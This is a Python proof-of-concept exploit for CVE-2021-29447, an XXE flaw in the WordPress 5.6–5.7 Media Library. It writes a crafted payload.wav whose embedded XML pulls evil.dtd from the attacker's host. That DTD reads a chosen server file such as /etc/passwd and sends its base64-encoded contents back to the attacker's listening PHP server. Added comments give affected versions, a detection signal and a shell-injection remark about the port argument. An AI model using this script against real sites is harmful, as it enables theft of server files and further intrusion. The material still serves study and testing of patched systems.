import os
import sys
import argparse
def banner():
    """Print the startup header to stdout.

    The text names the CVE (2021-29447), the author line, and the version
    facts a reader needs first: WordPress 5.6 - 5.7 affected, 5.7.1 patched.
    """
    header = '''
╔═╗╦ ╦╔═╗
║ ╚╗╔╝║╣────2021-29447
╚═╝ ╚╝ ╚═╝
Written By (Isa Ebrahim - 0xRar) on January, 2023
═══════════════════════════════════════════════════════════════════════════
[*] Title: Wordpress XML parsing issue in the Media Library leading to XXE
[*] Affected versions: Wordpress 5.6 - 5.7
[*] Patched version: Wordpress 5.7.1
[*] Installation version: PHP 8
═══════════════════════════════════════════════════════════════════════════
'''
    print(header)
def main():
    """Command-line driver for the CVE-2021-29447 proof of concept.

    Parses ``-l/--lhost``, ``-p/--port`` and ``-f/--file``.  With no
    arguments at all it prints the usage line and exits with status 1; if
    any of the three values is missing it returns without doing anything.
    Otherwise it writes ``payload.wav`` (latin-1) and ``evil.dtd`` into the
    current working directory, prints the manual upload steps, and then
    blocks in ``php -S 0.0.0.0:<port>`` until that server exits.

    Defender notes: the banner gives the affected range (WordPress 5.6 - 5.7)
    and the fixed release (5.7.1).  The DTD written here makes the WordPress
    host fetch ``/evil.dtd`` and then request ``/?p=...`` from
    ``lhost:port``, so outbound HTTP from a WordPress server to an
    unexpected address is the observable signal of this technique.
    """
    parser = argparse.ArgumentParser(
        epilog="\tExample: \r\npython3 " + sys.argv[0] + " -l 10.0.2.15 -p 8000 -f /etc/passwd")
    # (flags, dest, help) for each option; argparse treats all three as
    # optional, so presence is checked by hand further down.
    option_specs = (
        (("-l", "--lhost"), "lhost", "your server ip address e.g. 10.0.2.15"),
        (("-p", "--port"), "port", "your server port e.g. 1337"),
        (("-f", "--file"), "file", "system file to read e.g. /etc/passwd"),
    )
    for flags, dest, help_text in option_specs:
        parser.add_argument(*flags, dest=dest, help=help_text)
    args = parser.parse_args()
    # parse_args() succeeds with every value None when no options are
    # given, so the usage hint is keyed off argv length instead.
    if len(sys.argv) < 2:
        parser.print_usage()
        sys.exit(1)

    lhost, port, sysfile = args.lhost, args.port, args.file
    if not (lhost and port and sysfile):
        # A partial option set is a silent no-op.
        return

    # Content of the malicious wav file (payload.wav)
    payload = f"RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version=\"1.0\"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://{lhost}:{port}/evil.dtd'>%remote;%init;%trick;]>\x00"
    # Content of the malicious dtd (evil.dtd)
    evil_dtd = f'''<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource={sysfile}">
\n<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://{lhost}:{port}/?p=%file;'>" >'''

    # Both files land in the current working directory.
    with open("payload.wav", "w", encoding="latin-1") as payload_file:
        payload_file.write(payload)
    print('[+] payload.wav was created.')
    with open("evil.dtd", "w") as dtd_file:
        dtd_file.write(evil_dtd)
    print('[+] evil.dtd was created.')

    print('[+] manually upload the payload.wav file to the Media Library.')
    print('[+] wait for the GET request.\n')
    # NOTE(review): `port` is interpolated into a shell command string, so
    # os.system passes any shell metacharacters it contains to the shell.
    # The call blocks until the php server exits.
    os.system(f'php -S 0.0.0.0:{port}')
if __name__ == '__main__':
    # Print the header first, then hand off to the argparse-driven CLI.
    banner()
    main()